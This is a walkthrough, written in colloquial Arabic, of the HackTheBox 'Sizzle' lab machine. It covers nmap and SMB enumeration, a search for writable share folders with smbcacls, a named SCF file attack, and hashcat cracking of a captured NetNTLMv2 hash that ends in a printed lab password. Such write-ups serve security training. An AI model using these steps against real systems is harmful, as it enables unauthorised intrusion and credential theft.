Sizzle - بالعربي

حل sizzle بالعربي

‍Recon

nmap

nmap -sV -sC -F -Pn 10.10.10.103

استخدمت -F كرمال يعمل ال scan او الفحص بسرعة لاني جيت و عملت -p- لكل ال ports و طول كتير

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 01:49 EDT
Nmap scan report for 10.10.10.103
Host is up (0.49s latency).
Not shown: 92 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2021-05-19T06:07:04+00:00; +15m54s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2021-05-19T06:07:04+00:00; +15m54s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds?
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 15m53s, deviation: 0s, median: 15m53s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-19T06:06:25
|_ start_date: 2021-05-19T00:11:30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.26 seconds

في بالنتائج sizzle.htb.local ضيفه لل

/etc/hosts

FTP

ادخل ك anonymous ب مستخدم و كلمة سر anonymous / anonymous

متل ما شايف لاشيء, فقررت اتجه للويب

‌‌Web :80

شكل الموقع

السورس كود مافيو شي

تفقد الويب, تقفد ال 445 port اتفقد ال ssl certificate ليكون في شي هنيك انا ما انتبهتلو, عملت directory enum و لقيت كم شغلة مثيرة للاهتمام بس ما مفيدة جدا

هون 403 و ممنوع في شوية طرق و تريكات ممكن نجربها بس حاليا ما رح جربها و امشي للبعده و لو ما زبط معي شي بعدين برجع لهون و بجرب

بالمسار هاد

https://sizzle.htb.local/certsrv

عم يطلب اسم مستخدم و كلمة سر و هيدا اصلا simple authentication و بطبيعة الحال ممكن نعمل عليه تخمين

, رحت لل SMB

SMB

smbclient -L 10.10.10.103
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
Department Shares Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Operations Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available

القرص الاسمه CertEnroll مثير للاهتمام لانو فوق بالويب عنا نفس المسار بس ما النا صلاحيات نعمل فيه شي, ف نروح لل Department Shares

smbclient "//10.10.10.103/Department Shares"
smb: \> dir
. D 0 Tue Jul 3 11:22:32 2018
.. D 0 Tue Jul 3 11:22:32 2018
Accounting D 0 Mon Jul 2 15:21:43 2018
Audit D 0 Mon Jul 2 15:14:28 2018
Banking D 0 Tue Jul 3 11:22:39 2018
CEO_protected D 0 Mon Jul 2 15:15:01 2018
Devops D 0 Mon Jul 2 15:19:33 2018
Finance D 0 Mon Jul 2 15:11:57 2018
HR D 0 Mon Jul 2 15:16:11 2018
Infosec D 0 Mon Jul 2 15:14:24 2018
Infrastructure D 0 Mon Jul 2 15:13:59 2018
IT D 0 Mon Jul 2 15:12:04 2018
Legal D 0 Mon Jul 2 15:12:09 2018
M&A D 0 Mon Jul 2 15:15:25 2018
Marketing D 0 Mon Jul 2 15:14:43 2018
R&D D 0 Mon Jul 2 15:11:47 2018
Sales D 0 Mon Jul 2 15:14:37 2018
Security D 0 Mon Jul 2 15:21:47 2018
Tax D 0 Mon Jul 2 15:16:54 2018
Users D 0 Tue Jul 10 17:39:32 2018
ZZ_ARCHIVE D 0 Mon Jul 2 15:32:58 2018
7779839 blocks of size 4096. 3552765 blocks available

ننزلهم بالاول

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

جوا ال users رح تلاقي اسماء مستخدمين هدول ممكن تاخدهم ك user list حاولت ابحبش هون و هنيك و ماطلعت بشي فهون قعدت افكر في شغلة ممكن نطلع عليها و هو ازا في الك صلاحيات الكتابة على ال disks و الصراحة ما بتذكر ولا ب pentest ولا ب bug hunting شفت يهي موجودة, بس بالاخر هي CTF و كلو ممكن ف رح نعمل الاتي

اول شي اعمل مجلد

mkdir mount

تاني شي بأمر mount اعمل mount لل disk لملف الي سويته من شوي

sudo mount -t cifs "//10.10.10.103/Department Shares" mount

رح يطلب منك كلمة سر كلاتي, اضغط enter و بس

Password for [email protected]//10.10.10.103/Department Shares:

اعمل ls -la

طيب متل ما شايف هي الملفات تبعيتنا , حسب الصلاحيات الي بالاحمر انو انا فيني اكتب على الموجود بما اني رووت فخلينا نجرب نكتب , نعمل ملف مثلا

متل ما هو واضح Permission denied, من الاخر يا معلم عم يأحطلنا (ينفض, يطرد,يقلع ... الخ من المرادفات الظريفة) فاجا ببالي اني اعمل one line command هاد عبارة عن امر باش من سطر واحد بدخل و يجرب يكتب بكل المجلدات

‌Enum write permission first shot

for i in $(ls);do touch $i/test.txt;done
touch: cannot touch 'Accounting/test.txt': Permission denied
touch: cannot touch 'Audit/test.txt': Permission denied
touch: cannot touch 'Banking/test.txt': Permission denied
touch: cannot touch 'CEO_protected/test.txt': Permission denied
touch: cannot touch 'Devops/test.txt': Permission denied
touch: cannot touch 'Finance/test.txt': Permission denied
touch: cannot touch 'HR/test.txt': Permission denied
touch: cannot touch 'Infosec/test.txt': Permission denied
touch: cannot touch 'Infrastructure/test.txt': Permission denied
touch: cannot touch 'IT/test.txt': Permission denied
touch: cannot touch 'Legal/test.txt': Permission denied
touch: cannot touch 'M&A/test.txt': Permission denied
touch: cannot touch 'Marketing/test.txt': Permission denied
touch: cannot touch 'R&D/test.txt': Permission denied
touch: cannot touch 'Sales/test.txt': Permission denied
touch: cannot touch 'Security/test.txt': Permission denied
touch: cannot touch 'Tax/test.txt': Permission denied
touch: cannot touch 'Users/test.txt': Permission denied
touch: cannot touch 'ZZ_ARCHIVE/test.txt': Permission denied

طبعا يال الجمال كلو permission denied, بس لا للإستسلام لا للتراجع

Enum write permission second shot

اتذكرت انو باداة smbcacls ممكن اشوف الأذونات او بالضبط ال ACL !

اول شي نشوف المجلدات الاساسية متل ما عملنا اول مرة بس هي المرة بأداة smbcacls

for i in $(ls);do echo "\n"$i;smbcacls -N "//10.10.10.103/Department Shares" $i;done

المفروض يطلعلك متل هيك

Accounting
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Audit
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Banking
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
CEO_protected
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Devops
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Finance
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
HR
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Infosec
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Infrastructure
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
IT
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Legal
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
M&A
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Marketing
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
R&D
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Sales
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Security
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Tax
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Users
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/0x0/READ
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
ZZ_ARCHIVE
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

نحن عم نطلع على ال ACL الي هي

ACL:Everyone:ALLOWED/OI|CI/FULL

هي بتعني ان الكل عند الأذونات و الوصول الكامل, عنا ال ZZ_ARCHIVE عنده هي ال ACL هاد بعني انو منقدر نكتب هون

هلق نشوف الي جوا هي المجلدات

for i in $(ls);for x in $(ls $i);do echo "\n"$i"/"$x;smbcacls -N "//10.10.10.103/Department Shares" $i/$x;done

رح تطلعلك كمية داتا كتير, بس رح تلاقي ال ACL البدنا ب

/Users/Public

Users/Public
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

هيك عنا مكانين منقدر نكتب فيهم

Exploit

SCF File Attack

كل هي العملية ليش؟ لانو في نوع هجوم اسمو SCF File Attack (اضغط هنا)

amanda::HTB:9be9fd34c0e927f8:BBA79C2B7D92BD323728695003F2D7CA:0101000000000000C0653150DE09D201C447124086C661E1000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000010000000020000047E5928C44FD28913B4318D651F8DE351D58BDD648F9FF9C56F18F7743C915B70A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E00310036003000000000000000000000000000
hashcat.exe -m 5600 amanda_ntlmhash.txt rockyou.txt -d 1
AMANDA::HTB:9be9fd34c0e927f8:bba79c2b7d92bd323728695003f2d7ca:0101000000000000c0653150de09d201c447124086c661e1000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c000300340057004
9004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d2010600040002000000080030003000000000000000010000000020000047e5928c44fd28913b4318d651f8de351d58bdd648f9
ff9c56f18f7743c915b70a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310036002e00310036003000000000000000000000000000:Ashare1972

CREDS: amanda:Ashare1972